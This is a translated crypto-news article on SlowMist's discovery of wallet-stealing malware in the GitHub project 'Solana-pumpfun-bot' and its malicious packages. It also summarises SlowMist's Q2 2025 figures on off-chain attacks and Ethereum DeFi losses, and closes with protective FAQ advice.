SlowMist discovered malware in the open source project “Solana-pumpfun-bot” on GitHub that steals users’ cryptocurrency assets.
The case, through an investigation that began on July 2, 2025, revealed a sophisticated malware-based scheme to hijack cryptocurrency wallet data and multiple GitHub accounts involved.
MAIN CONTENT
The “Solana-pumpfun-bot” project contains malware that steals assets and has been warned by SlowMist.
The perpetrator used multiple GitHub accounts to spread fake news and distribute malware.
Cryptocurrency attack techniques are increasingly sophisticated, focusing on off-chain access points.
What is the “Solana-pumpfun-bot” project and why is it being reported?
Security expert SlowMist determined that this is a fake open source project that distributes malware that steals access to cryptocurrency wallets. The investigation showed that the project author and related GitHub accounts showed signs of distributing malicious software, using malicious packages such as “crypto-layout-utils” and “bs58-encrypt-utils” to collect wallet data.
The incident began when a victim contacted SlowMist on July 2, 2025, about the loss of wallet assets, all stemming from the use of software downloaded from GitHub containing malicious code.
Who is the prime suspect in this fraud?
After analysis, SlowMist discovered that the project author used multiple accounts to fork and distribute malicious software, and also forged trusted source code packages to increase credibility and expand the scope of the scam.
The fake software was updated on GitHub with the goal of searching for wallet-related files on the victim's computer and sending sensitive data to the attacker's server.
Lisa, Head of Operations SlowMist, 07/2025
Stolen cryptocurrency was transferred to FixedFloat exchange, indicating a reliable process for laundering money through intermediary channels.
Why are cryptocurrency hacking techniques more sophisticated today despite no breakthrough?
SlowMist reported in “MistTrack Stolen Fund Analysis” Q2/2025 that cryptocurrency hacking techniques have not progressed much technologically, but attack methods have become more sophisticated, especially exploiting off-chain weaknesses.
Lisa – Head of Operations at SlowMist – emphasized: “The current attack methods are more diverse, stealing assets through fake browser extensions, tampered hardware wallets or exploiting user behavior.”
“We see a clear shift from on-chain attacks to exploiting off-chain access points, such as browsers, social networks, and user authentication processes.”
Lisa, Head of Operations SlowMist, Q2 2025 Report
Typically, attackers impersonate popular websites like Notion or Zoom to trick users into downloading software that has been replaced with malicious code, or send fake cold wallet devices with winning notifications to encourage users to transfer money.
What are the common forms of cryptocurrency attacks today?
SlowMist's analysis of the causes of asset loss in Q2/2025 shows that fraud policies focus on social engineering and the distribution of counterfeit software.
Attack Method Description Impact Fake malware Downloading software from a popular website that has been modified to contain malicious code. Stealing access to wallets and personal information Fake cold wallet device Sending fake cold wallets with the persuasion of winning a prize or needing to transfer assets. Users are tricked into transferring assets to the bad guys Social engineering Causing panic and manipulating victims through fake notifications such as ‘risky signature detected’. Forcing users to perform wrong actions such as providing sensitive data
Additionally, attacks on the EIP-7702 vulnerability on Ethereum and WeChat account takeovers are examples of hackers exploiting cross-ecosystem connections.
How will Ethereum fare in the first half of 2025?
SlowMist announced that Ethereum ranked first in security losses in the first 6 months of 2025 with nearly $470 million in losses on DeFi platforms, leading other crypto ecosystems.
This figure reflects the high level of risk for Ethereum due to the popularity and rapid growth of DeFi on the platform.
Frequently Asked Questions
Is the “Solana-pumpfun-bot” project an official software? No, it is a fake project used to spread malware targeting cryptocurrency wallet users. What are the signs of malware on cryptocurrency software? The computer behaves strangely, reports errors continuously, requires unusual signature confirmation, and transfers money to a wallet that you did not initiate. How to protect cryptocurrencies from malware? Use software from official sources, update security regularly, and avoid clicking on strange links or downloading extensions of unknown origin. How sophisticated are current cryptocurrency attack techniques? Most of them exploit off-chain access points such as browsers, social networks, and target user behavior based on panic. How much damage has Ethereum suffered in recent cryptocurrency hacks? Ethereum suffered a loss of about $470 million on DeFi platforms in the first half of 2025, the highest in the cryptocurrency ecosystem.
Source: https://tintucbitcoin.com/solana-dinh-bay-danh-cap-coin/
Thank you for reading this article!
Please Like, Comment and Follow TinTucBitcoin to stay updated with the latest news about the cryptocurrency market and not miss any important information!
